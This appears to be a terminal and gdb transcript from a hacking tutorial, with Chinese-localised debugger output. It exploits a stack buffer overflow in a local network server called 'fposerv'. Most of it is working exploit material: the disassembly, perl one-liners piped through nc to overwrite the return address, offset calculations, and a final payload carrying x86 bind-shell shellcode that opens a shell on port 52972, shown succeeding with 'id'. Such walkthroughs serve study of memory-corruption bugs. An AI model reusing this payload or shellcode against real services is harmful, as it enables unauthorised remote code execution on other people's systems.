bugs@linux:~$ gcc -o
fposerv fposerv.cbugs@linux:~$ ./fposerv
Usage: ./fposerv portbugs@linux:~$ gdb
fposerv
GNU gdb 6.5
Copyright (C) 2006 Free Software Foundation, Inc.
(gdb) break
main
断点 1 位于 0x8048673
(gdb) disas vuln
汇编代码:
0x080485da :
push %ebp
0x080485db :
mov %esp,%ebp
0x080485dd :
sub $0x428,%esp
0x080485e3 :
movl $0x0,0xfffffbe4(%ebp)
0x080485ed :
sub $0x4,%esp
0x080485f0 :
push $0x400
0x080485f5 :
push $0x0
0x080485f7 :
lea 0xfffffbf8(%ebp),%eax
0x080485fd :
push %eax
0x080485fe :
call 0x80484a8
0x08048603 :
add $0x10,%esp
0x08048606 :
sub $0xc,%esp
0x08048609 :
pushl 0x8(%ebp)
0x0804860c :
call 0x8048448
0x08048611 :
add $0x10,%esp
0x08048614 :
cmp $0x40c,%eax
0x08048619 :
ja 0x8048648
0x0804861b :
mov 0x8(%ebp),%eax
0x0804861e :
cmpb $0x0,(%eax)
0x08048621 :
je 0x804866b
0x08048623 :
mov 0xfffffbe4(%ebp),%eax
0x08048629 :
lea 0xfffffff8(%ebp),%edx
0x0804862c :
add %edx,%eax
0x0804862e :
lea 0xfffffc00(%eax),%edx
0x08048634 :
mov 0x8(%ebp),%eax
0x08048637 :
incl 0x8(%ebp)
0x0804863a :
mov (%eax),%al
0x0804863c :
mov %al,(%edx)
0x0804863e :
lea 0xfffffbe4(%ebp),%eax
0x08048644 :
incl (%eax)
0x08048646 :
jmp 0x804861b
0x08048648 :
sub $0xc,%esp
0x0804864b :
pushl 0x8(%ebp)
0x0804864e :
call 0x8048448
0x08048653 :
add $0x10,%esp
0x08048656 :
cmp $0x40c,%eax
0x0804865b :
ja 0x804866b
0x0804865d :
sub $0xc,%esp
0x08048660 :
pushl 0xc(%ebp)
0x08048663 :
call 0x80485b4
0x08048668 :
add $0x10,%esp
0x0804866b :
leave 0x0804866c :
ret 结束汇编。
(gdb) break *vuln+145
Breakpoint 2 at 0x804866b
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555
断点 1, 0x08048673 位于 main ()
(gdb) x/x $ebp
0xbffff4c8: 0xbffff4e8
(gdb) x/x $ebp+4
0xbffff4cc: 0x4004728b
(gdb) c
Continuing.
[Terminal #2]
bugs@linux:~$ perl -e
'print "\x44\x43\x42\x41" x 259' | nc localhost
5555
[Terminal #1]
Breakpoint 2, 0x0804866b 位于 vuln ()
(gdb) c
Continuing.
程序接收信号SIGSEGV,线段故障。
0x08048825 位于 readsock ()
(gdb) i r
eax 0xbffff05c -1073745828
ecx 0x0 0
edx 0xbfffec3b -1073746885
ebx 0x4015bff0 1075167216
esp 0xbfffec44 0xbfffec44
ebp 0x41424344 0x41424344
esi 0xbffff520 -1073744608
edi 0x2 2
eip 0x8048825 0x8048825
eflags 0x10296 [ PF AF SF IF RF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x0 0
(gdb) x/12x $esp
0xbfffec44: 0x00000007 0x00000800 0x00000000 0x41424344
0xbfffec54: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffec64: 0x41424344 0x41424344 0x41424344 0x41424344
(gdb) x/x 0xbfffec50
0xbfffec50: 0x41424344
(gdb) c
Continuing.
程序接收信号SIGSEGV,线段故障。
程序不在存在。
(gdb) r 5555
启动程序:/home/bugs/fposerv 5555
断点 1, 0x08048673 位于 main ()
(gdb) c
Continuing.
[Terminal #2]
bugs@linux:~$ perl -e
'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" .
"\x44\x43\x42\x41" x 254 . "\x50\xec\xff\xbf"' | nc localhost
5555
[Terminal #1]
断点 2, 0x0804866b 位于 vuln ()
(gdb) c
Continuing.
程序接收信号SIGSEGV,线段故障。
0x41414141 位于 ?? ()
(gdb) x/x 0xbfffec50
0xbfffec50: 0x41414141
(gdb) x/x 0xbfffec60
0xbfffec60: 0x41424344
(gdb) c
Continuing.
程序接收信号SIGSEGV,线段故障。
程序不在存在。
(gdb) r 5555
启动程序:/home/bugs/fposerv 5555
断点 1, 0x08048673 位于 main ()
(gdb) c
Continuing.
[Terminal #2]
bugs@linux:~$ perl -e
'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" .
"\x44\x43\x42\x41" x 254 . "\x60\xec\xff\xbf"' | nc localhost
5555
[Terminal #1]
程序接收信号SIGSEGV,线段故障。
0x41424344 位于 ?? ()
(gdb) c
Continuing.
程序接收信号SIGSEGV,线段故障。
程序不在存在。
(gdb)
[Terminal #2]
bugs@linux:~$ pcalc 254*4
(以前的缓冲地址缓冲区)
1016 0x3f8 0y1111111000bugs@linux:~$ pcalc
1016-800 (缺少nops)
216 0xd8 0y11011000bugs@linux:~$ pcalc
216-84 (缺少shellcode)
132 0x84 0y10000100bugs@linux:~$ pcalc 132/4
(新的返回地址空间)
33 0x21 0y100001bugs@linux:~$
[Terminal #1]
(gdb) r 5555
Starting program: /home/bugs/fposerv 5555
断点 1, 0x08048673 位于 main ()
(gdb) c
Continuing.
[Terminal #2]
bugs@linux:~$ perl -e
'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" .
"\x44\x43\x42\x41" x 33 . "\x90" x 800 .
"\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\xce\xec\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
. "\x60\xec\xff\xbf"' | nc localhost 5555
[Terminal #1]
断点 2, 0x0804866b 位于 vuln ()
(gdb) c
Continuing.
程序接收信号SIGSEGV,线段故障。
0x41424344 位于 ?? ()
(gdb) x/250x
$esp 0xbfffec68: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffec78: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffec88: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffec98: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffeca8: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffecb8: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffecc8: 0x41424344 0x41424344 0x41424344 0x41424344
0xbfffecd8: 0x41424344 0x41424344 0x41424344 0x90909090
0xbfffece8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffecf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed18: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed28: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed38: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed48: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed58: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffed98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeda8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffedb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffedc8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffedd8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffede8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffedf8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee18: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee28: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee38: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee48: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee58: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffee98: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeea8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeeb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeec8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeed8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeee8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeef8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef08: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef18: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef28: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef38: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef48: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef58: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef68: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef78: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef88: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffef98: 0x90909090 0x90909090 0x90909090 0x90909090
---Type to continue, or q
to quit---
0xbfffefa8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffefb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffefc8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffefd8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffefe8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffeff8: 0x90909090 0x90909090 0x90909090 0x6a58666a
0xbffff008: 0x52995b01 0x89026a53 0x5280cde1 0x02ff6843
0xbffff018: 0xe189ecce 0x5051106a 0xc689e189 0x80cd66b0
0xbffff028: 0x66b04343 0x565280cd 0xb043e189 0x8980cd66
0xbffff038: 0xb0c389d9 0x80cd493f 0x52f8e241 0x732f6e68
0xbffff048: 0x2f2f6868 0xe3896962
(gdb) d
Delete all breakpoints? (y or n) y
(gdb) r 5555
启动程序:/home/bugs/fposerv 5555
[Terminal #2]
损坏最后的有效载荷:
填充料 -> _init 储存 ebp -> main()的返回地址
-> 目标
eip -> nops -> shellcode -> 缓冲区地址
[A *
8]->[\xe8\xf0\xff\xbf]->[\x8b\x72\x04\x40]->[\x08\xee\xff\xbf
* 33]->[\x90 *
800]->[\x6a.....\x80]->[\x90\xec\xff\xbf]
8
bytes 4
bytes 4
bytes 132
bytes 800
bytes 84
bytes 4 bytes
有效载荷总大小:1036 字节
bugs@linux:~$ perl -e
'print "A" x 8 . "\xe8\xf4\xff\xbf" . "\x8b\x72\x04\x40" .
"\x08\xee\xff\xbf" x 33 . "\x90" x 800 .
"\x6a\x66\x58\x6a\x01\x5b\x99\x52\x53\x6a\x02\x89\xe1\xcd\x80\x52\x43\x68\xff\x02\xce\xec\x89\xe1\x6a\x10\x51\x50\x89\xe1\x89\xc6\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80\x41\xe2\xf8\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
. "\x60\xec\xff\xbf"' | nc localhost 5555
[CRTL+C]
bugs@linux:~$ netstat
-antp | grep 52972
tcp 0 0
0.0.0.0:52972 0.0.0.0:* LISTEN 7089/fposervbugs@linux:~$ nc
localhost 52972
[Terminal #1]
程序接收信号SIGSEGV,Trace/breakpoint trap.
0x400007b0 in _start () from /lib/ld-linux.so.2
(gdb) c
Continuing.
[Terminal #2]
id
uid=1000(bugs) gid=100(users) groups=100(users)
exitbugs@linux:~$
::
Questions. Comments. Concerns. -->
HacK01[at]Live.cn ::
:: Hacker Netspy [Czy] ::